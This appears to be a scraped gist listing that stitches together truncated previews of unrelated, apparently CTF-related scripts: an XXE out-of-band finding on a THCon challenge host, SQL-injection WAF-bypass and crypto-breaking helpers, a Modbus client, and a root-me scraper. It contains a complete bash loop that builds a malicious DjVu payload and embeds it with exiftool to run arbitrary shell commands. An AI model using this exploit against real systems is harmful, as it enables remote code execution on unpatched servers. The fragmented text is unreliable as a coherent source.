XXE OOB Found on : http://challenges1.thcon.party:2000/create_pres.php
POST /create_pres.php HTTP/1.1
Host: challenges1.thcon.party:2000
#!/usr/bin/env python3 | |
import requests | |
from urllib.parse import urlsplit, parse_qs | |
import base64 | |
import time | |
class MYGES: | |
def __init__(self, username, password): |
#!/usr/bin/env bash | |
while true; do | |
read -p "> " userinput | |
if [[ "$userinput" =~ "exit" ]]; then exit; fi | |
payload="(metadata \"\\c\${system('rm uploads/*.jpg;echo dfff0a70fa1a55c8c1a4966c19f6da452 ; $userinput ; echo dfff0a70fa1a55c8c1a4966c19f6da452')};\")" | |
echo $payload > payload | |
bzz payload payload.bzz | |
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz | |
exiftool -config configfile '-HasselbladExif<=exploit.djvu' hacker.jpg 1> /dev/null |
import requests | |
import time | |
import string | |
TIMEOUT = 10 | |
def waf_bypass(payload): | |
return "||".join([f"'{c}'" for c in payload]) | |
def peek(substring): | |
substring = substring.strip() |
.386 | |
.model flat | |
.data | |
array DWORD 7,8,9,0,64,10,0,147,14 | |
.code | |
main proc | |
xor ecx, ecx |
XXE OOB Found on : http://challenges1.thcon.party:2000/create_pres.php
POST /create_pres.php HTTP/1.1
Host: challenges1.thcon.party:2000
from pymodbus.client.sync import ModbusTcpClient | |
UNIT = 1 | |
R = {"to_fill": 32, "valve_id": 0, "regu_id": 32} | |
G = {"to_fill": 126, "valve_id": 1, "regu_id": 33} | |
B = {"to_fill": 42, "valve_id": 2, "regu_id": 34} | |
MAX = 255 | |
M = {"register_id": 6, "max": 100} | |
F = {"register_id": 10, "max": 200} |
import requests | |
from bs4 import BeautifulSoup | |
import re | |
URL = "https://www.root-me.org/" | |
GRADES = { | |
"visitor": 100, | |
"curious": 500, | |
"trainee": 2017, | |
"insider": 3535, |
#!/usr/bin/env python3 | |
import requests | |
import string | |
import time | |
import sys | |
import random | |
import string | |
''' | |
table : | |
- users : |
#!/usr/bin/env python3 | |
import json | |
import os | |
import sys | |
import re | |
import binascii | |
from Crypto.Cipher import AES | |
from Crypto.Util.Padding import pad,unpad | |
BLOCK_SIZE = 16 |
#!/usr/bin/env python3 | |
import base64 | |
import argparse | |
import string | |
class XorBreak: | |
def __init__(self, clear, ciphertext, key, cribs): | |
self.clear = clear | |
self.ciphertext = ciphertext | |
self.key = key |